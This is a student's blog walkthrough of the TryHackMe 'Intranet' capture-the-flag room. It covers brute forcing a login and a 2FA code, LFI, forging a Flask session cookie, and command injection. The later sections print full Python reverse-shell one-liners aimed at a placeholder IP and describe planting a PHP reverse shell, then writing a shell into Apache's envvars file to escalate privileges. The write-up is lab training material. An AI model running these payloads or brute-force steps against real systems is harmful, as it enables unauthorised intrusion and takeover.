Ayman ZERDA

Ayman ZERDA

My name is Ayman Zerda, I am currently a Cybersecurity Engineering Student

TryHackMe: Intranet

Published in 06-25, 2023

header

LINK : Intranet

Enumeration :

  • Let’s scan our target using nmap
# nmap -sV -T4 10.10.130.175
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-24 06:12 EDT
Nmap scan report for 10.10.130.175
Host is up (0.11s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
7/tcp    open  echo
21/tcp   open  ftp        vsftpd 3.0.3
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d0b6fe8240d28918a574d13b247d944 (RSA)
|   256 9a841ca3e37a8f4abb6e892df621d5f2 (ECDSA)
|_  256 22309e1708459ca873d35a3cd75bdaf3 (ED25519)
23/tcp   open  telnet     Linux telnetd
80/tcp   open  http       Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
8080/tcp open  http-proxy Werkzeug/2.2.2 Python/3.8.10
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was /login
  • The scan reveals 6 open ports, an echo service on port 7, ftp running on port 21, ssh running on 22, a telnet service on port 23, and 2 web applications running on ports 80 and 8080.
  • port 21 and 23 required credentials that we don’t have.

  • Visiting the web app on port 80, we are prompted with the message “Currently under construction”.

  • The web application on port 8080 redirected to a login page, it indicates that the username is in format of user@securesolacoders.no, the hint for the first flag indicates that we have to create 2 custom wordlists for the username and the password.
  • Looking at the source code, we found 2 possible usernames (devops,anders), i tried to login using these 2 usernames with a random password, all these logins seems to be valid because of the error message Invalid password (the web application is vulenrable to username enumeration), i was able to find another valid username admin@securesolacoders.no.
  • Now we have to find out how to create a wordlist for the password, i noticed that some chars are forbidden so we need to remove the special chars from the wordlist.
  • You can create a wordlist either using this website weakpass generator with the word securesolacoders or using john.
john --wordlist=password.txt --rules=jumbo --stdout > passwords.txt

the password.txt file contains the word securesolacoders, don’t forget to remove the special chars from passwords.txt

  • You can remove special characters from passwords.txt using this command:
sed -i 's/[^a-zA-Z0-9]//g' passwords.txt
  • Now let’s use Hydra to brute force the login page
hydra -L users.txt -P passwords.txt X.X.X.X -s 8080 http-post-form "/login:username=^USER^&password=^PASS^:Invalid password" -V

intranet1

Flag 1 :

  • With the found creds, we are able to login and get the first flag. intranet2

Flag 2:

  • A verification code is required to enter a 2FA code, we can brute force it using ffuf.
  • Looking at the source code, you can be sure that only four chars are needed.
  • We have a lot of options to create a wordlist that contains 4 digits numbers from 0000 to 9999.
crunch 4 4 -t %%%% -o numbers.txt

intranet3

  • OR
for i in {0000..9999}; do echo "$i"; done > numbers.txt
  • Now it’s time to brute force the 2FA code using ffuf.

intranet4

  • You can extract the jwt session cookie and pass it to the -b option.

it’s a random number, it changes every time so don’t bother urself using this code.

FLAG 3 :

  • Now it’s time to use ur fav app security testing software, i will use Caido (it’s like a Burp Suite Professional but free).
  • Visiting the internal page, an update button stands out, let’s intercept the request when we click on it.

intranet5

  • As you can see the body contains a parameter called news, this might be vulnerable to LFI. intranet6

  • Testing for LFI: intranet7

  • The hint says that the CMD will lead you to the source, the /proc/self/cmdline reveals the command line arguments passed to a process. intranet8

  • So now we have the location to the flask application (remeber Werkzeug/2.2.2 Python/3.8.10 from the nmap scan, Flask wraps Werkzeug, using it to handle the details of WSGI)

  • Reading the app.py file, you will find the 3rd flag in the source code. intranet9

FLAG 4 :

  • In order to access the admin panel we have to become an admin.

  • By reading the first line of the app.py, you can see how the app generates the jwt session key, the key contains secret_key_ concatenated with a random number between 100000 and 999999. intranet10

  • Now we can find the session key and generate session key for other users using Flask-unsgin.

Download Flask-unsign

  • But first we need to create a wordlist contains all the possible session key using this command:
for i in $(seq 100000 999999); do echo "secret_key_$i"; done > wordlist.txt

intranet11

  • Extract the cookie session and save it to a file named jwt.txt

  • Find the session key:

flask-unsign --unsign --cookie < jwt.txt --wordlist=wordlist.txt

intranet12

  • To create our own cookie session, we have to check how the jwt session token is structured.

intranet13

  • Now we can create a cookie session for the admin.

intranet14

  • Change the cookie session and visit the admin panel.

intranet15 intranet16

FLAG 5: Initial foothold

  • Back to the source code again, from the highlited line we can see that we can interact with system because of os.system() call if we send a POST request with a value for debug.

intranet17

  • Let’s use this python reverse shell payload:
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("X.X.X.X",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Don’t forget to add your ip address and url-encode the payload before you send the request.

intranet18

intranet19

FLAG 6 :

  • Checking the processes:
ps auxw

intranet20

  • Anders is running the apache web server on port 80, so this our way to escalate to anders
  • Change directory to /var/www/html and create a page just to confirm our theory.

intranet21 intranet22

  • So now that we are sure, all we need is to put a php reverse shell in /var/www/html

php reverse shell , don’t forget to change the ip address

intranet23

  • Visiting the web server on port 80 : X.X.X.X/php-reverse-shell.php will trigger the reverse shell.

intranet24

FLAG 7 :

  • Let’s check the sudo permission.

intranet25

  • We are able to restart the apache2 service with sudo permission.

  • Running linpeas will reveal that the envvars file in /etc/apache2 is writable by anders.

linpeas

intranet26

  • All we have to do now it to add the same python reverse shell that we used before into the envvars file and then restart the apache2 server.
echo 'python -c '\''import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("X.X.X.X",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'\''' > envvars

intranet27

  • When we restart the server with sudo permissions, envvars is called and we get our reverse shell.

intranet28